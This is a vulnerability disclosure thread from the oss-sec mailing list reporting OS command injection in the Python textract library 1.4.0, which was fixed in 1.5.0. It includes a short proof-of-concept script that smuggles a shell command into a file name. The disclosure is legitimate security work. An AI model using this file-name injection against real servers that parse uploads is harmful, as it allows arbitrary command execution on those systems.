oss-sec mailing list archives

Re: CVE request - textract 1.4.0 - OS Command Injection

From: Pierre Ernst <pernst () salesforce com>
Date: Thu, 17 Nov 2016 09:18:26 -0500

Version 1.5.0 includes a fix for this

https://github.com/deanmalmgren/textract/releases/tag/v1.5.0


On Thu, Oct 20, 2016 at 5:40 PM, Pierre Ernst <pernst () salesforce com> wrote:

The Python textract component (https://github.com/
deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS command injection.

this fork contains a fix:
https://github.com/pierre-ernst/textract


Parsing a file with a malicious name leads to arbitrary OS command
injection, this is especially risky when parsing user-supplied files on a
server (e.g. uploaded files)

PoC:

import textract
import sys
import os

# create a file with a malicious name and arbitrary content
fileName = './test";gnome-calculator;#.pdf'
file = open(fileName,'w+')
file.write('Pierre Ernst, Salesforce')
file.close()

# parse newly created file
text = textract.process(fileName)
print text

# cleanup
os.remove(fileName);


--
Pierre Ernst
Salesforce



-- 
Pierre Ernst
Senior Application Security Engineer
M&A Security
Salesforce.com
mobile: +1 613-404-1450
timezone: EDT

Current thread:

CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Oct 20)
- Re: CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Nov 17)